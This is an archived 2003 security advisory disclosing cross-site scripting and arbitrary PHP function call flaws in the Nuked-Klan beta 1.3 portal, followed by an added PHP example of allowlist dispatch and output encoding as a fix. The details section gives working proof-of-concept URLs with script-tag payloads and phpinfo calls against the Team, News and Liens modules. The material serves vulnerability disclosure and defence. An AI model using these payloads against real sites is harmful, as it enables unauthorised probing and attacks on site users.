[SCSA-006] XSS & Function Execution Vulnerabilities in Nuked-Klan

From: Grégory (gregory.lebras@security-corp.org)
Date: Fri Feb 21 2003 - 17:44:50 PST

    ________________________________________________________________________
    
    Security Corporation Security Advisory [SCSA-006]
    ________________________________________________________________________
    
    PROGRAM: Nuked-Klan
    HOMEPAGE: http://www.nuked-klan.org
    VULNERABLE VERSIONS: beta 1.3
    ________________________________________________________________________ 
    
    
    DESCRIPTION
    ________________________________________________________________________
    
    Nuked Klan is a PHP Gateway for "clans".
    
    (direct quote from Nuked Klan website)
    
    
    DETAILS & EXPLOITS
    ________________________________________________________________________
    
    Many Cross-Site Scripting vulnerabilities have been found in Nuked Klan. 
    They allow attackers to inject script code into a page, which then runs 
    in the client's browser as if it had been provided by the site.
    
    These Cross-Site Scripting vulnerabilities are found in the following 
    modules: Team, News, Links (Liens). 
    
    An attacker can input specially crafted links and/or other 
    malicious scripts.
    
    Moreover, this vulnerability allows an attacker to call certain 
    PHP functions.
    
    
    
    Team
    ________________________________________________________________________
    
    A vulnerability was discovered at this address: 
    
    XSS:
    ----
    
    http://[target]/index.php?file=Team&op=<script>alert('Test');</script>
    
    
    Function Execution:
    -------------------
    
    http://[target]/index.php?file=Team&op=phpinfo
    
    (display phpinfo(); - Outputs lots of PHP information)
    
    
    News
    ________________________________________________________________________
    
    
    A vulnerability was discovered at this address: 
    
    XSS:
    ----
    
    http://[target]/index.php?file=News&op=<script>alert('test');</script>
    
    
    Function Execution:
    -------------------
    
    http://[target]/index.php?file=News&op=phpinfo
    
    (display phpinfo(); - Outputs lots of PHP information)
    
    
    Links
    ________________________________________________________________________
    
    A vulnerability was discovered at this address: 
    
    XSS:
    ----
    
    http://[target]/index.php?file=Liens&op=<script>alert('test');</script>
    
    
    Function Execution:
    -------------------
    
    http://[target]/index.php?file=Liens&op=phpinfo
    
    (display phpinfo(); - Outputs lots of PHP information)
    
    
    SOLUTIONS
    ________________________________________________________________________
    
    No solutions for the moment.
    
    
    VENDOR STATUS 
    ________________________________________________________________________
    
    The vendor has reportedly been notified and is currently developing 
    a patch.
    
    
    LINKS
    ________________________________________________________________________
    
    http://www.security-corp.org/index.php?ink=4-15-1
    
    French version: 
    
    http://www.security-corp.org/advisories/SCSA-006-FR.txt
    
    
    ------------------------------------------------------------
    Grégory Le Bras aka GaLiaRePt | http://www.Security-Corp.org
    ------------------------------------------------------------
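
Added example, not part of the advisory and not Nuked-Klan code: a hardened way to handle the "op" parameter so that it is never used as a function name and is HTML-encoded before being reflected. It assumes the module calls the function named by "op" and echoes unrecognised values; the advisory does not show the source, and the handler names (op_index, op_detail) are hypothetical.

```php
<?php
// Added example: hardened dispatch for an "op" request parameter.
// ASSUMPTION: the module calls the function named by "op" (e.g. $op();) and
// echoes unknown values back; the advisory does not show Nuked-Klan's source.

// Hypothetical module actions; only these names are ever callable.
function op_index(): string { return "team list"; }
function op_detail(): string { return "team member detail"; }

const ALLOWED_OPS = [
    'index'  => 'op_index',
    'detail' => 'op_detail',
];

/** Encode untrusted text for an HTML body or quoted-attribute context. */
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/**
 * Resolve "op" against the allowlist and return the page body.
 * The request value is only a lookup key; it is never used as a callable.
 */
function dispatch(array $query): string
{
    $op = $query['op'] ?? 'index';
    if (!is_string($op)) {          // op[]=x arrives as an array
        return 'Invalid operation.';
    }
    if (!array_key_exists($op, ALLOWED_OPS)) {
        // Rejected value is encoded before being reflected in the response.
        return 'Unknown operation: ' . h($op);
    }
    return h((ALLOWED_OPS[$op])());
}

// Constructed sample requests, mirroring the parameter shapes in the advisory.
$samples = [
    ['file' => 'Team', 'op' => 'detail'],
    ['file' => 'Team', 'op' => 'phpinfo'],
    ['file' => 'Team', 'op' => "<script>alert('Test');</script>"],
    ['file' => 'Team', 'op' => ['x']],
];
foreach ($samples as $q) {
    echo dispatch($q), PHP_EOL;
}
```

With this dispatch, op=phpinfo is reported as an unknown operation instead of being executed, and the script payload is emitted as inert encoded text.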
    


